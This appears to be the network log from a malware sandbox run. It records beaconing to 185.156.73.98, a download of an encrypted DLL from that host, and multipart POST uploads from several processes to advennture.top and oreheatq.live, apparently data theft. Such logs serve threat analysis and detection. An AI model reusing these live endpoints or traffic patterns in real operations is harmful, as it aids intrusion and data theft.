GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:37 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:39 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:42 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:44 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:48 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/success?substr=mixthree&s=three&sub=none

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /success?substr=mixthree&s=three&sub=none HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/info

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /info HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:31 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/update

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /update HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:31 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 99856
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:32 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:34 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:36 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:38 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:40 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:43 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:45 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:47 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:49 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:51 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:53 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

TRnueDLgiwI.TRnueDLgiwI

Passwords.com

Remote address:

8.8.8.8:53

Request

TRnueDLgiwI.TRnueDLgiwI

IN A

Response
DNS

advennture.top

d744367ecb.exe

Remote address:

8.8.8.8:53

Request

advennture.top

IN A

Response

advennture.top

IN A

104.21.25.9

advennture.top

IN A

172.67.221.138
POST

https://advennture.top/GKsiio

Passwords.com

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 59
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GDyM2iYhLyV4UM%2FauY7Nlr3iSPPcWVIVJM%2FihcJme8d18YgACo72yr2S%2BwveUmrkde5GVZ4pFEcGx3N0VXotveLOssyuzdn8RjvrsbHhOHXZYJ0t%2FsqMpO12vQ2CR3ouEw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe3bacdfebf0a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46567&min_rtt=43079&rtt_var=15443&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=630&delivery_rate=80254&cwnd=253&unsent_bytes=0&cid=d1aae67db3d5ad6e&ts=265&x=0"
POST

https://advennture.top/GKsiio

Passwords.com

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ht91Q859lzvhWC2j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1510
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HlepEScN8W4BJ%2FBL9ySiVeFiA6U%2F4o1dty3CAUa71AN3jzhYWI17%2BfItOhBWE0Bpf1hKJOBrls9KcA3K3VqJRrW7mhuw%2B3hUz3Nvr1GJG79Xv4WXiMu%2FNxTlY0RMgnckw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe3bc4f7bbf0a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46283&min_rtt=43079&rtt_var=12150&sent=10&recv=11&lost=0&retrans=0&sent_bytes=3806&recv_bytes=2480&delivery_rate=80254&cwnd=255&unsent_bytes=0&cid=d1aae67db3d5ad6e&ts=446&x=0"
POST

https://advennture.top/GKsiio

Passwords.com

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Mndv7xnv3A7p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1064
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 927fe3be7bd9ccc1-LHR
alt-svc: h3=":443"; ma=86400
POST

https://advennture.top/GKsiio

Passwords.com

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 97
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZT2MCujbfNsDgCc5AdDpowW8Mzbj9Xl82Z0grtJ4V8QyGU6LSzDWJps%2Fxn5yqCXX0SAdJsV%2BAZKcSoIQB3OZFkTJlXoPb21P%2FgaT%2FnHcE3W5mmdAwP0yL5EAsaYyZp1nyw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe3c0ad2e6325-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=44954&min_rtt=43742&rtt_var=11262&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=678&delivery_rate=82475&cwnd=253&unsent_bytes=0&cid=e6bc4a1e331e7c8a&ts=241&x=0"
DNS

esccapewz.run

d744367ecb.exe

Remote address:

8.8.8.8:53

Request

esccapewz.run

IN A

Response
DNS

esccapewz.run

d744367ecb.exe

Remote address:

8.8.8.8:53

Request

esccapewz.run

IN A
DNS

travewlio.shop

d744367ecb.exe

Remote address:

8.8.8.8:53

Request

travewlio.shop

IN A

Response
DNS

touvrlane.bet

d744367ecb.exe

Remote address:

8.8.8.8:53

Request

touvrlane.bet

IN A

Response
DNS

wxayfarer.live

5cf0a9b56c.exe

Remote address:

8.8.8.8:53

Request

wxayfarer.live

IN A

Response
DNS

sighbtseeing.shop

d744367ecb.exe

Remote address:

8.8.8.8:53

Request

sighbtseeing.shop

IN A

Response
POST

https://advennture.top/GKsiio

d744367ecb.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 65
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LqzfFMJgY1zm9t56T2i9mDhL%2FQj4%2BRZWQm73WsBC1e4HQ6g2PPamyKcjJGz35eQ0g%2B5Imf36vwa4xYzAScDsPG1642ICCboN%2FB%2BAWSheGCv1yh72QfYeSCJkkjLwvx5cw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe403394f948f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50176&min_rtt=47964&rtt_var=14260&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=646&delivery_rate=81522&cwnd=253&unsent_bytes=0&cid=b6b76edcab342490&ts=270&x=0"
POST

https://advennture.top/GKsiio

d744367ecb.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WhfUfEpAl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1489
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnh4zWGdP7Qea2ZI0GEiY5aG%2BAfMoJWeCaxi%2BnKymqk0WTXVVRzqSU6oxuQ8r0BOVqkZxi5IsZ4YuE5wKHgGxVetsX0eCQ50FMg4PpagpbFbAoyOSggzi3OUeTaHW%2FaTVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe404cae6948f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49310&min_rtt=43174&rtt_var=12427&sent=9&recv=11&lost=0&retrans=0&sent_bytes=3806&recv_bytes=2480&delivery_rate=81522&cwnd=255&unsent_bytes=0&cid=b6b76edcab342490&ts=451&x=0"
POST

https://oreheatq.live/gsopp

5cf0a9b56c.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 51
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fJ%2Bt4ZrgwOxh%2FTtDzyrxe9KSYTuTfT8PWd1j7YFJA19ya1FFbPM2K4DRNlC3%2BLE4RNhFZeWGKznfSlYoMFwuEMNeucgUjDKYfslK%2Bldz6DzGFIw%2FRhK8Tla3owxRj5hu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe403b96d641e-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50240&min_rtt=47228&rtt_var=15682&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=629&delivery_rate=82757&cwnd=253&unsent_bytes=0&cid=62414d919f356a45&ts=210&x=0"
POST

https://oreheatq.live/gsopp

5cf0a9b56c.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WKUYIf9Ylbj3ASnWEv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1520
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 927fe404fa7c641e-LHR
alt-svc: h3=":443"; ma=86400
POST

https://advennture.top/GKsiio

d744367ecb.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=1nb9lnAxrvW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1074
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bBsqauHJUt1SyyguzaOzP1K%2Frky8414jF7Nt89Ep%2FrOf7ioRWnefAA0LjPm3jlCxIPKtczKlVLhvWShBHvyaqwHvvs7PISvtfwecvq3I0vaUluk%2FTWULH4CPTkP2NxXvog%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe4070a5603bb-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48198&min_rtt=43374&rtt_var=16541&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1670&delivery_rate=61480&cwnd=253&unsent_bytes=0&cid=c8ccdaac82dbd404&ts=281&x=0"
POST

https://oreheatq.live/gsopp

5cf0a9b56c.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=MMzfMv0GA9t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1060
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 927fe40718de1adb-LHR
alt-svc: h3=":443"; ma=86400
POST

https://oreheatq.live/gsopp

5cf0a9b56c.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 89
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
